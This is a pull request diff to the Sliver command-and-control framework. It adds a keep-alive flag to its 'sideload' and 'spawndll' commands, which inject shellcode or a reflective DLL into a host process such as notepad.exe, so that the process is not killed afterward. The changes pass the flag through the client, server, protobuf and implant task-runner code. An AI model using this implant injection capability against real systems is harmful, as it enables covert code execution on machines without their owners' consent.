### PR TITLE
Add keep-alive switch to sideload and spawndll

### DIFF
--- a/client/command/bind-commands.go
+++ b/client/command/bind-commands.go
@@ -1074,6 +1074,7 @@ func BindCommands(app *grumble.App, rpc rpcpb.SliverRPCClient) {
 			f.String("p", "process", `c:\windows\system32\notepad.exe`, "Path to process to host the shellcode")
 			f.Bool("s", "save", false, "save output to file")
 			f.Int("t", "timeout", defaultTimeout, "command timeout in seconds")
+			f.Bool("k", "keep-alive", false, "don't terminate host process once the execution completes")
 		},
 		AllowArgs: true,
 		HelpGroup: consts.SliverHelpGroup,
@@ -1094,6 +1095,7 @@ func BindCommands(app *grumble.App, rpc rpcpb.SliverRPCClient) {
 			f.String("e", "export", "ReflectiveLoader", "Entrypoint of the Reflective DLL")
 			f.Bool("s", "save", false, "save output to file")
 			f.Int("t", "timeout", defaultTimeout, "command timeout in seconds")
+			f.Bool("k", "keep-alive", false, "don't terminate host process once the execution completes")
 		},
 		AllowArgs: true,
 		HelpGroup: consts.SliverWinHelpGroup,

--- a/client/command/tasks.go
+++ b/client/command/tasks.go
@@ -325,6 +325,7 @@ func sideload(ctx *grumble.Context, rpc rpcpb.SliverRPCClient) {
 		Data:        binData,
 		EntryPoint:  entryPoint,
 		ProcessName: processName,
+		Kill:        !ctx.Flags.Bool("keep-alive"),
 	})
 	ctrl <- true
 	<-ctrl
@@ -379,6 +380,7 @@ func spawnDll(ctx *grumble.Context, rpc rpcpb.SliverRPCClient) {
 		Args:        args,
 		EntryPoint:  exportName,
 		Request:     ActiveSession.Request(ctx),
+		Kill:        !ctx.Flags.Bool("keep-alive"),
 	})
 
 	if err != nil {

--- a/implant/sliver/handlers/handlers_windows.go
+++ b/implant/sliver/handlers/handlers_windows.go
@@ -291,7 +291,7 @@ func spawnDllHandler(data []byte, resp RPCResponse) {
 	//{{if .Config.Debug}}
 	log.Printf("ProcName: %s\tOffset:%x\tArgs:%s\n", spawnReq.GetProcessName(), spawnReq.GetOffset(), spawnReq.GetArgs())
 	//{{end}}
-	result, err := taskrunner.SpawnDll(spawnReq.GetProcessName(), spawnReq.GetData(), spawnReq.GetOffset(), spawnReq.GetArgs())
+	result, err := taskrunner.SpawnDll(spawnReq.GetProcessName(), spawnReq.GetData(), spawnReq.GetOffset(), spawnReq.GetArgs(), spawnReq.Kill)
 	spawnResp := &sliverpb.SpawnDll{Result: result}
 	if err != nil {
 		spawnResp.Response = &commonpb.Response{

--- a/implant/sliver/handlers/rpc-handlers.go
+++ b/implant/sliver/handlers/rpc-handlers.go
@@ -153,7 +153,7 @@ func sideloadHandler(data []byte, resp RPCResponse) {
 	if err != nil {
 		return
 	}
-	result, err := taskrunner.Sideload(sideloadReq.GetProcessName(), sideloadReq.GetData(), sideloadReq.GetArgs())
+	result, err := taskrunner.Sideload(sideloadReq.GetProcessName(), sideloadReq.GetData(), sideloadReq.GetArgs(), sideloadReq.Kill)
 	errStr := ""
 	if err != nil {
 		errStr = err.Error()

--- a/implant/sliver/taskrunner/task_darwin.go
+++ b/implant/sliver/taskrunner/task_darwin.go
@@ -58,7 +58,7 @@ func RemoteTask(processID int, data []byte, rwxPages bool) error {
 }
 
 // Sideload - Side load a library and return its output
-func Sideload(procName string, data []byte, args string) (string, error) {
+func Sideload(procName string, data []byte, args string, kill bool) (string, error) {
 	var (
 		stdOut bytes.Buffer
 		stdErr bytes.Buffer

--- a/implant/sliver/taskrunner/task_linux.go
+++ b/implant/sliver/taskrunner/task_linux.go
@@ -56,7 +56,7 @@ func RemoteTask(processID int, data []byte, rwxPages bool) error {
 }
 
 // Sideload - Side load a library and return its output
-func Sideload(procName string, data []byte, args string) (string, error) {
+func Sideload(procName string, data []byte, args string, kill bool) (string, error) {
 	var (
 		nrMemfdCreate int
 		stdOut        bytes.Buffer

--- a/implant/sliver/taskrunner/task_windows.go
+++ b/implant/sliver/taskrunner/task_windows.go
@@ -225,7 +225,7 @@ func ExecuteAssembly(data []byte, process string) (string, error) {
 	return stdoutBuf.String() + stderrBuf.String(), nil
 }
 
-func SpawnDll(procName string, data []byte, offset uint32, args string) (string, error) {
+func SpawnDll(procName string, data []byte, offset uint32, args string, kill bool) (string, error) {
 	err := refresh()
 	if err != nil {
 		return "", err
@@ -270,17 +270,20 @@ func SpawnDll(procName string, data []byte, offset uint32, args string) (string,
 	log.Printf("[*] RemoteThread started. Waiting for execution to finish.\n")
 	// {{end}}
 
-	err = waitForCompletion(threadHandle)
-	if err != nil {
-		return "", err
+	if kill {
+		err = waitForCompletion(threadHandle)
+		if err != nil {
+			return "", err
+		}
+		cmd.Process.Kill()
+		return stdoutBuff.String() + stderrBuff.String(), nil
 	}
-	cmd.Process.Kill()
-	return stdoutBuff.String() + stderrBuff.String(), nil
+	return "", nil
 }
 
 //SideLoad - Side load a binary as shellcode and returns its output
-func Sideload(procName string, data []byte, args string) (string, error) {
-	return SpawnDll(procName, data, 0, "")
+func Sideload(procName string, data []byte, args string, kill bool) (string, error) {
+	return SpawnDll(procName, data, 0, "", kill)
 }
 
 // Util functions

--- a/protobuf/sliverpb/sliver.proto
+++ b/protobuf/sliverpb/sliver.proto
@@ -348,6 +348,7 @@ message SideloadReq {
   string ProcessName = 2;
   string Args = 3;
   string EntryPoint = 4;
+  bool Kill = 5;
 
   commonpb.Request Request = 9;
 }
@@ -363,6 +364,7 @@ message InvokeSpawnDllReq {
   string ProcessName = 2;
   string Args = 3;
   string EntryPoint = 4;
+  bool Kill = 5;
 
   commonpb.Request Request = 9;
 }
@@ -372,6 +374,7 @@ message SpawnDllReq {
   string ProcessName = 2;
   uint32 Offset = 3;
   string Args = 4;
+  bool Kill = 5;
 
   commonpb.Request Request = 9;
 }

--- a/server/rpc/rpc-tasks.go
+++ b/server/rpc/rpc-tasks.go
@@ -157,6 +157,7 @@ func (rpc *Server) Sideload(ctx context.Context, req *sliverpb.SideloadReq) (*sl
 			Request:     req.Request,
 			Data:        shellcode,
 			ProcessName: req.ProcessName,
+			Kill:        req.Kill,
 		})
 		if err != nil {
 			return nil, err
@@ -204,6 +205,7 @@ func (rpc *Server) SpawnDll(ctx context.Context, req *sliverpb.InvokeSpawnDllReq
 		ProcessName: req.ProcessName,
 		Args:        req.Args,
 		Request:     req.Request,
+		Kill:        req.Kill,
 	})
 	if err != nil {
 		return nil, err


### PR DESCRIPTION
This PR adds the `kee-alive` flag (`-k`) to the `sideload` and `spawndll` commands, to avoid killing the host process once the injected thread has completed its job.
